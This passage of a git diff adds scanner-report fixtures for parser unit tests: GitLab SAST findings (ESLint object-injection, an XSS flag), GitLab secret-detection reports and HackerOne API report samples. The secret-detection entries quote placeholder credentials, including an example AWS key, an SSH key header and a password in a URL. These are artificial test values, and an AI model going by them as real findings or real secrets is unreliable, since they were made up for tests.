security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/templates/dojo/endpoints.html:06c0a08b858a757bbfb193940ed6944251feb2c7e52c4092405edeb63fe8d9d4:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/templates/dojo/endpoints.html", + "start_line": 183, + "end_line": 183, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/templates/dojo/endpoints.html:09cd1a209ee7018f0590a7dd95372220e504852b7bbbdeb4a6577597e4e8c6b1:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/templates/dojo/endpoints.html", + "start_line": 246, + "end_line": 246, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/templates/dojo/endpoints.html:75d022b5aeb8d0ebd057ed8a6dd71e34c96fda0e982a79a89ecb64bfbe229d76:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/templates/dojo/endpoints.html", + "start_line": 141, + "end_line": 141, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/templates/dojo/new_rule.html:174bf82e7bf9414dfe3028414c56de510e6e452ec85dc103a8d1ae8879d521a4:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/templates/dojo/new_rule.html", + "start_line": 89, + "end_line": 89, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/templates/dojo/new_rule.html:71101e0d191826f7a732714d5288da2446ab9bdb9eadb7e486b76624709f56ae:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/templates/dojo/new_rule.html", + "start_line": 86, + "end_line": 86, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/templates/dojo/new_rule.html:d89cdbb643440389e600693b61f838d7ebd9c0b6e51526fddef1566e555cbb02:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/templates/dojo/new_rule.html", + "start_line": 88, + "end_line": 88, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/templates/dojo/view_cred_all_details.html:09cd1a209ee7018f0590a7dd95372220e504852b7bbbdeb4a6577597e4e8c6b1:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/templates/dojo/view_cred_all_details.html", + "start_line": 236, + "end_line": 236, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/templates/dojo/view_cred_details.html:09cd1a209ee7018f0590a7dd95372220e504852b7bbbdeb4a6577597e4e8c6b1:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/templates/dojo/view_cred_details.html", + "start_line": 283, + "end_line": 283, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/templates/dojo/view_objects.html:09cd1a209ee7018f0590a7dd95372220e504852b7bbbdeb4a6577597e4e8c6b1:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/templates/dojo/view_objects.html", + "start_line": 131, + "end_line": 131, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/templates/dojo/view_objects_eng.html:09cd1a209ee7018f0590a7dd95372220e504852b7bbbdeb4a6577597e4e8c6b1:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/templates/dojo/view_objects_eng.html", + "start_line": 121, + "end_line": 121, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/unittests/scans/sonarqube/sonar-4-findings-3-to-aggregate.html:68695edf4fa8fa9a21e1f17705ca2436a74e03690cd79bc121f8059aeff23d66:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/unittests/scans/sonarqube/sonar-4-findings-3-to-aggregate.html", + "start_line": 6705, + "end_line": 6705, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/unittests/scans/sonarqube/sonar-4-findings-3-to-aggregate.html:e68e1c09aea26f3557910e998c55d5efcc3fcf8f07ff618085cf9e2ff77c1377:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/unittests/scans/sonarqube/sonar-4-findings-3-to-aggregate.html", + "start_line": 6709, + "end_line": 6709, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/unittests/scans/sonarqube/sonar-4-findings-3-to-aggregate.html:e8208d82c08970eea19d4137099f8f71ee21a2cc9f51319dbccf1a2fe0bb2574:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/unittests/scans/sonarqube/sonar-4-findings-3-to-aggregate.html", + "start_line": 6702, + "end_line": 6702, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/unittests/scans/sonarqube/sonar-6-findings.html:68695edf4fa8fa9a21e1f17705ca2436a74e03690cd79bc121f8059aeff23d66:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/unittests/scans/sonarqube/sonar-6-findings.html", + "start_line": 7494, + "end_line": 7494, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/unittests/scans/sonarqube/sonar-6-findings.html:e68e1c09aea26f3557910e998c55d5efcc3fcf8f07ff618085cf9e2ff77c1377:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/unittests/scans/sonarqube/sonar-6-findings.html", + "start_line": 7498, + "end_line": 7498, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/unittests/scans/sonarqube/sonar-6-findings.html:e8208d82c08970eea19d4137099f8f71ee21a2cc9f51319dbccf1a2fe0bb2574:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/unittests/scans/sonarqube/sonar-6-findings.html", + "start_line": 7491, + "end_line": 7491, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/unittests/scans/sonarqube/sonar-rule-undefined.html:68695edf4fa8fa9a21e1f17705ca2436a74e03690cd79bc121f8059aeff23d66:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/unittests/scans/sonarqube/sonar-rule-undefined.html", + "start_line": 437, + "end_line": 437, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/unittests/scans/sonarqube/sonar-rule-undefined.html:e68e1c09aea26f3557910e998c55d5efcc3fcf8f07ff618085cf9e2ff77c1377:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/unittests/scans/sonarqube/sonar-rule-undefined.html", + "start_line": 441, + "end_line": 441, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/unittests/scans/sonarqube/sonar-rule-undefined.html:e8208d82c08970eea19d4137099f8f71ee21a2cc9f51319dbccf1a2fe0bb2574:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/unittests/scans/sonarqube/sonar-rule-undefined.html", + "start_line": 434, + "end_line": 434, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/unittests/scans/sonarqube/sonar-single-finding.html:68695edf4fa8fa9a21e1f17705ca2436a74e03690cd79bc121f8059aeff23d66:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/unittests/scans/sonarqube/sonar-single-finding.html", + "start_line": 7443, + "end_line": 7443, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/unittests/scans/sonarqube/sonar-single-finding.html:e68e1c09aea26f3557910e998c55d5efcc3fcf8f07ff618085cf9e2ff77c1377:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/unittests/scans/sonarqube/sonar-single-finding.html", + "start_line": 7447, + "end_line": 7447, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/unittests/scans/sonarqube/sonar-single-finding.html:e8208d82c08970eea19d4137099f8f71ee21a2cc9f51319dbccf1a2fe0bb2574:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/unittests/scans/sonarqube/sonar-single-finding.html", + "start_line": 7440, + "end_line": 7440, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/unittests/scans/sonarqube/sonar-table-in-table.html:68695edf4fa8fa9a21e1f17705ca2436a74e03690cd79bc121f8059aeff23d66:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/unittests/scans/sonarqube/sonar-table-in-table.html", + "start_line": 486, + "end_line": 486, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/unittests/scans/sonarqube/sonar-table-in-table.html:e68e1c09aea26f3557910e998c55d5efcc3fcf8f07ff618085cf9e2ff77c1377:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/unittests/scans/sonarqube/sonar-table-in-table.html", + "start_line": 490, + "end_line": 490, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/unittests/scans/sonarqube/sonar-table-in-table.html:e8208d82c08970eea19d4137099f8f71ee21a2cc9f51319dbccf1a2fe0bb2574:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/unittests/scans/sonarqube/sonar-table-in-table.html", + "start_line": 483, + "end_line": 483, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + } + ], + "remediations": [] +} diff --git a/unittests/scans/gitlab_sast/gl-sast-report_issue4344.json b/unittests/scans/gitlab_sast/gl-sast-report_issue4344.json new file mode 100644 index 00000000000..d72d130063f --- /dev/null +++ b/unittests/scans/gitlab_sast/gl-sast-report_issue4344.json @@ -0,0 +1,44 @@ +{ + "version": "14.0.0", + "vulnerabilities": [ + { + "id": "38646099571534a07b62ae42b37fb3640d620c48d561456fb3ecdf929b9e5933", + "category": "sast", + "name": "Potential XSS vulnerability", + "message": "Potential XSS vulnerability", + "cve": "XXXX.aspx.cs:98:SCS0029", + "scanner": { + "id": "security_code_scan", + "name": "Security Code Scan" + }, + "location": { + "file": "XXXXX.aspx.cs", + "start_line": 98 + }, + "identifiers": [ + { + "type": "security_code_scan_rule_id", + "name": "SCS0029", + "value": "SCS0029", + "url": "https://security-code-scan.github.io/#SCS0029" + } + ] + } + ], + "remediations": [], + "scan": { + "scanner": { + "id": "security_code_scan", + "name": "Security Code Scan", + "url": "https://security-code-scan.github.io", + "vendor": { + "name": "GitLab" + }, + "version": "3.5.3" + }, + "type": "sast", + "start_time": "2021-04-22T09:32:27", + "end_time": "2021-04-22T09:33:29", + "status": "success" + } +} diff --git a/unittests/scans/gitlab_secret_detection_report/gitlab_secret_detection_report_1_vuln.json b/unittests/scans/gitlab_secret_detection_report/gitlab_secret_detection_report_1_vuln.json new file mode 100644 index 00000000000..4acc8d60ee4 --- /dev/null +++ b/unittests/scans/gitlab_secret_detection_report/gitlab_secret_detection_report_1_vuln.json @@ -0,0 +1,52 @@ +{ + "version": "14.0.0", + "vulnerabilities": [ + { + "id": "714ed3e4e289ad35a089e0a888e8d0120b6a6083b1090a189cbc6a3227396240", + "category": "secret_detection", + "name": "AWS", + "message": "AWS detected; please remove and revoke it if this is a leak.", + "description": "AWS", + "cve": "README.md:1a5d44a2dca19669d72edf4c4f1c27c4c1ca4b4408fbb17f6ce4ad452d78ddb3:AWS", + "severity": "Critical", + "confidence": "Unknown", + "raw_source_code_extract": "AKIAIOSFODNN7EXAMPLE", + "scanner": { + "id": "gitleaks", + "name": "Gitleaks" + }, + "location": { + "file": "README.md", + "commit": { + "date": "0001-01-01T00:00:00Z", + "sha": "0000000" + }, + "start_line": 5, + "end_line": 5 + }, + "identifiers": [ + { + "type": "gitleaks_rule_id", + "name": "Gitleaks rule ID AWS", + "value": "AWS" + } + ] + } + ], + "remediations": [], + "scan": { + "scanner": { + "id": "gitleaks", + "name": "Gitleaks", + "url": "https://github.com/zricethezav/gitleaks", + "vendor": { + "name": "GitLab" + }, + "version": "v7.5.0" + }, + "type": "secret_detection", + "start_time": "2021-06-02T09:13:09", + "end_time": "2021-06-02T09:13:09", + "status": "success" + } +} diff --git a/unittests/scans/gitlab_secret_detection_report/gitlab_secret_detection_report_3_vuln.json b/unittests/scans/gitlab_secret_detection_report/gitlab_secret_detection_report_3_vuln.json new file mode 100644 index 00000000000..cdbe6f9449a --- /dev/null +++ b/unittests/scans/gitlab_secret_detection_report/gitlab_secret_detection_report_3_vuln.json @@ -0,0 +1,114 @@ +{ + "version": "14.0.0", + "vulnerabilities": [ + { + "id": "918e2cdfda408c352ee1f9b1fd148926578a8cfec32a82cd0cd21d4aded6e85e", + "category": "secret_detection", + "name": "SSH private key", + "message": "SSH private key detected; please remove and revoke it if this is a leak.", + "description": "SSH private key", + "cve": "README.md:03d104c669e3c7b6be7f989db8b12c8b910d3be8c1e2a73c9369d3cc0ba803b5:SSH private key", + "severity": "Critical", + "confidence": "Unknown", + "raw_source_code_extract": "-----BEGIN OPENSSH PRIVATE KEY-----", + "scanner": { + "id": "gitleaks", + "name": "Gitleaks" + }, + "location": { + "file": "README.md", + "commit": { + "date": "0001-01-01T00:00:00Z", + "sha": "0000000" + }, + "start_line": 20, + "end_line": 20 + }, + "identifiers": [ + { + "type": "gitleaks_rule_id", + "name": "Gitleaks rule ID SSH private key", + "value": "SSH private key" + } + ] + }, + { + "id": "5f2fe26d5029737fcd2d131b5f881ddb32edf7ebc003dfab8b5bcd4f05640f98", + "category": "secret_detection", + "name": "AWS", + "message": "AWS detected; please remove and revoke it if this is a leak.", + "description": "AWS", + "cve": "README.md:1a5d44a2dca19669d72edf4c4f1c27c4c1ca4b4408fbb17f6ce4ad452d78ddb3:AWS", + "severity": "Critical", + "confidence": "Unknown", + "raw_source_code_extract": "AKIAIOSFODNN7EXAMPLE", + "scanner": { + "id": "gitleaks", + "name": "Gitleaks" + }, + "location": { + "file": "README.md", + "commit": { + "date": "0001-01-01T00:00:00Z", + "sha": "0000000" + }, + "start_line": 7, + "end_line": 7 + }, + "identifiers": [ + { + "type": "gitleaks_rule_id", + "name": "Gitleaks rule ID AWS", + "value": "AWS" + } + ] + }, + { + "id": "b472ce0c4949cc5e22fc0193978b8eab4a7bafe5cd3d23c8de217d11a59431c5", + "category": "secret_detection", + "name": "Password in URL", + "message": "Password in URL detected; please remove and revoke it if this is a leak.", + "description": "Password in URL", + "cve": "README.md:9aa1da8f23a3e99f2b894638b0d6c584b1613075eca0f74d79de0c7bd07e150b:Password in URL", + "severity": "Critical", + "confidence": "Unknown", + "raw_source_code_extract": "https://random:password@endpoint.com/path", + "scanner": { + "id": "gitleaks", + "name": "Gitleaks" + }, + "location": { + "file": "README.md", + "commit": { + "date": "0001-01-01T00:00:00Z", + "sha": "0000000" + }, + "start_line": 14, + "end_line": 14 + }, + "identifiers": [ + { + "type": "gitleaks_rule_id", + "name": "Gitleaks rule ID Password in URL", + "value": "Password in URL" + } + ] + } + ], + "remediations": [], + "scan": { + "scanner": { + "id": "gitleaks", + "name": "Gitleaks", + "url": "https://github.com/zricethezav/gitleaks", + "vendor": { + "name": "GitLab" + }, + "version": "v7.5.0" + }, + "type": "secret_detection", + "start_time": "2021-06-02T09:25:50", + "end_time": "2021-06-02T09:25:50", + "status": "success" + } +} diff --git a/unittests/scans/h1/data_empty.json b/unittests/scans/h1/data_empty.json new file mode 100644 index 00000000000..7c7347adc1b --- /dev/null +++ b/unittests/scans/h1/data_empty.json @@ -0,0 +1,9 @@ +{ + "data": [ + ], + "links": { + "self": "https://api.hackerone.com/v1/reports?filter%5Bprogram%5D%5B%5D=security&page%5Bnumber%5D=1", + "next": "https://api.hackerone.com/v1/reports?filter%5Bprogram%5D%5B%5D=security&page%5Bnumber%5D=2", + "last": "https://api.hackerone.com/v1/reports?filter%5Bprogram%5D%5B%5D=security&page%5Bnumber%5D=5" + } +} diff --git a/unittests/scans/h1/data_many.json b/unittests/scans/h1/data_many.json new file mode 100644 index 00000000000..a6016f4bbc0 --- /dev/null +++ b/unittests/scans/h1/data_many.json @@ -0,0 +1,274 @@ +{ + "data": [ + { + "id": "1337", + "type": "report", + "attributes": { + "title": "XSS in login form", + "state": "new", + "created_at": "2016-02-02T04:05:06.000Z", + "vulnerability_information": "...", + "triaged_at": null, + "closed_at": null, + "last_reporter_activity_at": null, + "first_program_activity_at": null, + "last_program_activity_at": null, + "bounty_awarded_at": null, + "last_activity_at": null, + "last_public_activity_at": null, + "swag_awarded_at": null, + "disclosed_at": null, + "source": null, + "reporter_agreed_on_going_public_at": null + }, + "relationships": { + "reporter": { + "data": { + "id": "1337", + "type": "user", + "attributes": { + "username": "api-example", + "name": "API Example", + "disabled": false, + "created_at": "2016-02-02T04:05:06.000Z", + "profile_picture": { + "62x62": "/assets/avatars/default.png", + "82x82": "/assets/avatars/default.png", + "110x110": "/assets/avatars/default.png", + "260x260": "/assets/avatars/default.png" + } + } + } + }, + "assignee": { + "data": { + "id": "1337", + "type": "user", + "attributes": { + "username": "member", + "name": "Member", + "disabled": false, + "created_at": "2016-02-02T04:05:06.000Z", + "profile_picture": { + "62x62": "/assets/avatars/default.png", + "82x82": "/assets/avatars/default.png", + "110x110": "/assets/avatars/default.png", + "260x260": "/assets/avatars/default.png" + } + } + } + }, + "program": { + "data": { + "id": "1337", + "type": "program", + "attributes": { + "handle": "security", + "created_at": "2016-02-02T04:05:06.000Z", + "updated_at": "2016-02-02T04:05:06.000Z" + } + } + }, + "severity": { + "data": { + "id": "57", + "type": "severity", + "attributes": { + "rating": "high", + "author_type": "User", + "user_id": 1337, + "created_at": "2016-02-02T04:05:06.000Z", + "score": 8.7, + "attack_complexity": "low", + "attack_vector": "adjacent", + "availability": "high", + "confidentiality": "low", + "integrity": "high", + "privileges_required": "low", + "user_interaction": "required", + "scope": "changed" + } + } + }, + "weakness": { + "data": { + "id": "1337", + "type": "weakness", + "attributes": { + "name": "Cross-Site Request Forgery (CSRF)", + "description": "The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.", + "external_id": "cwe-352", + "created_at": "2016-02-02T04:05:06.000Z" + } + } + }, + "structured_scope": { + "data": { + "id": "57", + "type": "structured-scope", + "attributes": { + "asset_identifier": "api.example.com", + "asset_type": "url", + "confidentiality_requirement": "high", + "integrity_requirement": "high", + "availability_requirement": "high", + "max_severity": "critical", + "created_at": "2015-02-02T04:05:06.000Z", + "updated_at": "2016-05-02T04:05:06.000Z", + "instruction": null, + 